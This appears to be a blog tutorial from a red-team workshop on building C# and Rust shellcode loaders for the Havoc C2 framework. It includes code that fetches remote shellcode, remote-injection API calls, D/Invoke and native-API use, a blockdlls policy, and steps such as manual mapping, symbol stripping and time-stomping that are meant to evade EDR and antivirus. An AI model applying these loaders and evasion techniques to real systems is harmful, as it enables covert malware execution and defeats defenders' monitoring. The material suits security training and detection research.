Exploring Dynamic Invocation for Process Injection in C# and Rust

Post Created: 15 May, 2023

Background

A while ago, I (w/ @pikaroot) conducted a Red Teaming/Malware Development workshop titled "Red Team Ops: Havoc 101" before graduating from university. As a fan of The Last of Us, I developed a series of thematic Process Injector/Shellcode Loader named after different Infected variants from the series to work with Havoc Framework. This blogpost will cover the thought process behind developing them and techniques implemented to evade detection.

This walkthrough is meant for beginners in Malware Development. If you're a seasoned and experienced MalDev, I suggest turning back for the sake of your time.

Disclaimer

While preparing for this workshop, I was in the middle of studying Red Team Ops II (Certified Red Team Lead) course by Zero-Point Security. Therefore, a lot of the development ideas are heavily borrowed and inspired by the course itself.

Special thanks to:

Introduction

Just like the Cordyceps from The Last of Us, all five Process Injectors are introduced progressively with added functionalities and improvements to them. Note that, the goal of this project IS NOT about creating a FUD malware with advanced evasion techniques such as AES Encryption, Polymorphism or Sandbox Evasion. It is instead focused on removing OPSEC indicators that may be flagged or raise suspicion.

Runner: The Baseline

Starting from scratch, I used a list of questions as a baseline to build up the specifications for Runner:

  • Programming Language - Access to Windows API?

  • Shellcode Delivery - Hardcoded or Fetch Remotely?

  • Victim Process - Current or Remote Process?

  • Injection Technique - Classic Injection or Advanced? (e.g. EarlyBird, Hell's Gate)

Programming Language

For the choice of programming language, I decided to go with C# because of my incompetency in C++ 🤡. Since C# is considered managed code, we need to leverage Platform Invoke (P/Invoke) provided by the System.Runtime.InteropServices namespace to invoke Windows API. If you are new to this concept, check out this blog by Matt Hand @ SpecterOps.

The usual way of using P/Invoke in C#:

[DllImport("kernel32.dll", EntryPoint = "OpenProcess", SetLastError = true)]
public static extern IntPtr fnOpenProcess(
        ProcessAccessFlags dwDesiredAccess,
        bool bInheritHandle,
        UInt32 dwProcessId);

This however comes with it's own OPSEC implications, because any reference to a Windows API call made through P/Invoke will result in a corresponding entry in the .NET Assembly’s Import Address Table (IAT).

This static reference is of course an added advantage if you're using Windows API for legitimate purposes because the application does not need to actively locate the function before calling it, thereby saving time and resources.

As a Malware Developer, this can be used against us, since Malware Analysts and automated security tools commonly inspect the IAT of executables via IAT hooking to learn about their behavior.

To circumvent IAT hooking, this implementation will be improved further later on for Stalker using Dynamic Invocation.

Shellcode Delivery

Traditionally, Malware Developers hardcode AES/XOR or even RC4 encrypted shellcode within the executable to evade detection, like the following:

// Raw Shellcode
unsigned char shellcode[] = { 0x48, 0x65, 0x6c, 0x6c, 0x6f };

// Encrypted RC4
unsigned char shellcode[] = { 0x41, 0xd6, 0xaa, 0x12, 0x8e };

However, this also introduces an unnecessary amount of entropy to it, which increases the odds of detection if the entropy value is over a threshold.

Encryption = Higher Entropy = More Randomness = Lower Compression

To avoid all the fuss with entropy detection, we're going to stage our shellcode on a remote server, then fetch it at runtime.

byte[] shellcode = { };

using (var handler = new HttpClientHandler())
{
    handler.ServerCertificateCustomValidationCallback = (message, cert, chain, sslPolicyErrors) => true;

    using (var client = new HttpClient(handler))
    {
        try
        {
            shellcode = await client.GetByteArrayAsync(urlPath);
        }
        catch
        {
            Process.GetCurrentProcess().Kill();
        }
    }
}

Depending on your scenario, you might want to avoid fetching shellcode remotely because the HTTPS connection may serve as an Indicator of Compromise (IoC). It is also not feasible if the target network has no outbound Internet connection.

Victim Process

Local vs Remote

Personally speaking, there is no certain answer as to which is better between Local and Remote Process Injection. I believe what is being presented here is a give-and-take scenario, as each of the methods comes with its own OPSEC considerations.

Often times, it can be difficult to avoid certain bad practices, therefore the ideal way in my opinion is to go with the one with minimal or tolerable OPSEC indicators. To accommodate such requirements, all Process Injectors in this blogpost will have the option to either inject locally or remotely.

Local Process Injection

Pros:

  • Occurs entirely in the current process, and therefore does not require handles to remote processes.

Cons:

  • Requires extra effort to blend in.

  • Loader must stay alive for back-and-forth C2 connection.

Remote Process Injection

Pros:

  • Loader injects C2 implant shellcode to remote process and exits immediately.

  • Extra flexibility when it comes to victim process selection. Freedom to inject into legitimate processes like Teams, Discord & Slack to blend into traffic.

  • Compatible with behavioral evasion techniques like PPID Spoofing.

Cons:

  • Suspicious memory allocation to remote processes.

  • Requires handles to remote processes.

Injection Technique

There are a ton of fancy injection techniques out there such as Asynchronous Procedure Call (APC), Process Hollowing, Process Herpaderping and many more, but for the sake of simplicity, we will use the most classic method. This technique is fairly straightforward and self-explanatory based on the API names themselves, so I won't be discussing it in detail.

[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(
    IntPtr hProcess,
    IntPtr lpAddress,
    uint dwSize,
    AllocationType flAllocationType,
    MemoryProtection flProtect);
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(
    IntPtr hProcess,
    IntPtr lpBaseAddress,
    byte[] lpBuffer,
    int nSize,
    out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtectEx(
    IntPtr hProcess,
    IntPtr lpAddress,
    uint dwSize,
    MemoryProtection flNewProtect,
    out MemoryProtection lpflOldProtect);
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr CreateRemoteThread(
    IntPtr hProcess,
    IntPtr lpThreadAttributes,
    uint dwStackSize,
    IntPtr lpStartAddress,
    IntPtr lpParameter,
    uint dwCreationFlags,
    out IntPtr lpThreadId);

For more advanced process injection techniques, check out Red Team Notes.

Tool Processing

Before delivering the tool, we can also strip off any additional static indicators like debugging symbols to prevent tracing back to us.

Debug Symbols

One of the common mistakes that is often overlooked is having your home directory embedded in the executable. This is terrible OPSEC because there is a chance that your custom tooling may be instantly flagged if it matches any past occurrences from VirusTotal (assuming you are a well-known & tracked actor) despite having cutting-edge evasion tactics implemented.

It is actually not that hard to strip debugging symbols. Simply compile your program in Release mode.

You can also clone metadata from a legitimate application, and apply time stomping so that the file blends in with your pre-text.

Detection

As mentioned earlier, IAT hooking can be implemented to detect Runner. However, the most simplest approach in this case would be to monitor the usage of Win32 API using API Monitor by rohitab.

Stalker: The Unseen

As the successor from previous stage, Stalker is improved in different ways using: Dynamic Invocation & leveraging native APIs.

Dynamic Invocation

Rather than statically importing API calls with P/Invoke, Dynamic Invocation (D/Invoke) can be used to load the Windows DLLs e.g. kernel32.dll & ntdll.dll at runtime and call it's exported functions, thereby bypassing API hooking, specifically IAT hooking. Read more about D/Invoke here.

The usual way of using D/Invoke in C#:

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate NTSTATUS NtAllocateVirtualMemory(
    IntPtr processHandle,
    ref IntPtr baseAddress,
    IntPtr zeroBits,
    ref IntPtr regionSize,
    AllocationType flAllocationType,
    MemoryProtection flProtect);
    
var fPtr = Generic.GetLibraryAddress("ntdll.dll", "NtAllocateVirtualMemory");
NtAllocateVirtualMemory fnNtAllocateVirtualMemory = Marshal.GetDelegateForFunctionPointer(fPtr, typeof(NtAllocateVirtualMemory)) as NtAllocateVirtualMemory;
var status = (NTSTATUS)fnNtAllocateVirtualMemory(
    target.Handle,
    ref baseAddress,
    IntPtr.Zero,
    ref regionSize,
    AllocationType.Commit | AllocationType.Reserve,
    MemoryProtection.ExecuteReadWrite);

As red team tradecraft advances over the years, D/Invoke is now a well-known technique, resulting in the original version of D/Invoke by TheWover to be heavily signatured.

Ideally, we want to use a custom version of D/Invoke for a cleaner detection result, but for the sake of simplicity, we can opt for a minified version of D/Invoke by RastaMouse. Simply import all the source files into the project or add DInvoke.dll as a reference to the project.

Upon compilation, Visual Studio will spit out both .exe and .dll files. This is obviously non-ideal if we want to deliver a single executable file to our victim.

This also means that the executable will not function properly if the .dll file it depends on is missing from the same directory.

To solve this issue, install a dependency merger like dnMerge or Fody to statically link two files together.

Native API

From a user-land perspective, there is no real benefit to call kernel32 level API when Native API is still within our reach. At the end of the day, Win32 API like VirtualAllocEx will end up calling NtAllocateVirtualMemory which is its equivalent API in the native level.

Win32 API Process Injection
VirtualAllocEx() ---> WriteProcessMemory() ---> VirtualProtectEx() ---> CreateRemoteThread()

Assuming that you have an (outdated) EDR that still apply hooks on the Win32 level, leveraging Native API is the simplest way you can bypass the hooks without any fancy evasion tactics.

Native API Process Injection
NtAllocateVirtualMemory() ---> NtWriteVirtualMemory() ---> NtProtectVirtualMemory() ---> NtCreateThreadEx()

Most Native API are undocumented in MSDN. You can instead rely on DInvoke.net, Undocumented NTInternals or ReactOS Source to obtain the API signature.

Detection

On top of IAT Hooking, EDR also frequently implements Inline Hooking. A major difference between the two is that IAT takes place in the Import Address Table, while Inline Hooking occurs within DLL modules that are loaded during process startup.

Before Inline Hooking is implemented, the assembly code for all Native APIs follows a similar structure known as a Syscall Stub with the following opcode:

mov r10, rcx
mov eax, 0C7H <--- SSN
syscall
ret

The only difference that you may notice is the value of System Service Number (SSN), which governs the type of Native API invoked.

To emulate the detection of Stalker, we will use SylantStrike to place EDR hooks via Inline Hooking. Ideally, a robust EDR will have much more complex nested conditions in place to examine the legitimacy of API call, and to avoid false positives. However, for the sake of simplicity, we will have SylantStrike alert us with a MessageBox whenever a suspicious thread is created.

DWORD NTAPI NtCreateThreadEx(OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN PVOID ObjectAttributes, IN HANDLE ProcessHandle, IN PVOID lpStartAddress, IN PVOID lpParameter, IN ULONG Flags, IN SIZE_T StackZeroBits, IN SIZE_T SizeOfStackCommit, IN SIZE_T SizeOfStackReserve, OUT PVOID lpBytesBuffer) {
	if (lpStartAddress == (LPTHREAD_START_ROUTINE)suspiciousBaseAddress) {

		MessageBox(nullptr, TEXT("Malicious NtCreateThreadEx usage detected! Aborting!"), TEXT("SylantStrike"), MB_OK);
		TerminateProcess(GetCurrentProcess(), 0xdead1337);
		return 0;
	}

	// False positive, call the original function as normal
	return pOriginalNtCreateThreadEx(hThread, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, Flags, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer);
}

I like to call EDRs trusted malware because they basically leverage the same set of techniques that Malware Developers use to inject DLLs into our processes. This tampers the original structure of the Syscall Stub, and divert the application flow to an address space controlled by the EDR using a simple jmp instruction.

To verify whether a process is injected by EDR, simply navigate to the Modules tab in Process Hacker to enumerate the presence of EDR DLLs.

Another thing worth noting is that a real EDR might also take iterative steps to monitor for malicious behaviours prior to injection. In simpler words, it will not take any proactive action when abnormal memory allocation or protection modification occurs; instead, it will continue to monitor for more events before eventually terminating the process.

Clicker: The Convoy

There are several aggressive ways to neutralize (unhook) EDR hooks, which involve patching the Native API Syscall Stub to restore it back to its original instructions. This, however, poses a detrimental risk if proceeded without caution, especially against EDRs that perform integrity checks on their hooks.

Process Mitigation Policy (BlockDLLs)

With all these obstacles presented, what is a better way of unhooking rather than aggressive patching? - stopping EDR from injecting in the first place, using Process Mitigation Policy. Processes with this policy enabled will DENY EDRs from injecting their DLLs unless the DLLs are signed and trusted by Microsoft.

At this point, you might realize that Clicker is actually not a process injector, but rather a carrier that will spawn Stalker with Process Mitigation Policy enabled, hence the name Convoy.

Using Windows API, it provides us with more granular control over the processes that we create. This is merely one of the many examples that we can play with to evade detection. Other interesting properties that exist out there includes: CREATE_SUSPENDED, CREATE_NO_WINDOW and many more that will allow you to hide in plain sight.

In this case, we will use UpdateProcThreadAttribute specifically to apply the PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY attribute to enforce blockdlls.

const int PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = 0x00020007;
const long PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000;

IntPtr lpMitigationPolicy = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteInt64(lpMitigationPolicy, PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON);

fPtr = Generic.GetLibraryAddress("kernel32.dll", "UpdateProcThreadAttribute");
Win32.UpdateProcThreadAttribute fnUpdateProcThreadAttribute = Marshal.GetDelegateForFunctionPointer(fPtr, typeof(Win32.UpdateProcThreadAttribute)) as Win32.UpdateProcThreadAttribute;
var success = fnUpdateProcThreadAttribute(
    si.lpAttributeList,
    0,
    (IntPtr)PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY,
    lpMitigationPolicy,
    (IntPtr)IntPtr.Size,
    IntPtr.Zero,
    IntPtr.Zero);

Pitfalls

As this technique became more well-known and popularized, Microsoft ended blockdlls once and for all by handing out intermediate certificates to EDR vendors, allowing them to sign their DLLs so that it can be injected into processes that have Process Mitigation Policy enabled.

As far as I am aware, EDR will typically inject more than one DLL to create a more robust detection. The problem is, not all DLLs of a vendor will be Microsoft-signed. While this may not allow you to circumvent EDR entirely, you might still find opportunities to impair certain functionalities of the EDR due to this defect.

Bloater: The Sovereign

To achieve a clean EDR bypass, Bloater implements Manual Mapping from D/Invoke to bypass Inline Hooking. This is a relatively safe way of circumventing EDR because the integrity of EDR hooks is not tampered with.

Manual Mapping

Whenever a user-land process is initialized, an EDR will install hooks on the DLL modules e.g. kernel32.dll and ntdll.dll that live inside the process memory. All of this takes place before control over the process is diverted back to the user.

Manual Mapping takes advantage of this time window to ensure that all DLLs loaded afterwards are free of EDR hooks. Instead of exporting API calls from modules that are hooked (red region), it will map a fresh copy of ntdll.dll from disk into the process memory at runtime. As a result, all API calls invoked from the "evil twin" of ntdll.dll (green region) will not be hooked, thereby bypassing EDR detection.

RatKing: The Overlord

If our process injector falls into the hands of a Security Anlayst, it can be decompiled and reverse engineered pretty quickly using tools like iLSpy or dnSpy.

We can make their life (and ours) significantly harder by porting the code from C# to Rust, because writing and decompiling Rust is quite literally brainf$ck.

With a clean 0/26 detection result from antiscan.me, I believe the rationale behind this is due to the way Rust statically link all external crates during compilation time, which messes up all the detection signatures.

Analyzing the executable in VirusTotal also shows a significantly low detection rate of 1/70. I might be wrong, but I believe that the Command Line Parser also plays a big role here. If the proper arguments are not provided from the command line, the executable will not detonate. This is known as Environmental Keying or Execution Guardrails, which could very well be the reason why sandboxes are having a hard time analyzing the file.

While Rust provides a clean detection result (for now), it is not even close to being as flexible as C/ASM. Ultimately, we ended up adding several external libraries for support due to the difficulty nature of Rust. This can be used as an indicator for detection in the long run.

2 Months Later

As the source code and compiled binaries of all Process Injectors were open-sourced on GitHub, Microsoft Defender quickly picked up on this and assigned 2 different Malware Detection Names. This is very common, as we all know by now that Microsoft acquired GitHub for the sole purpose of collecting security intelligence 👀.

References

Last updated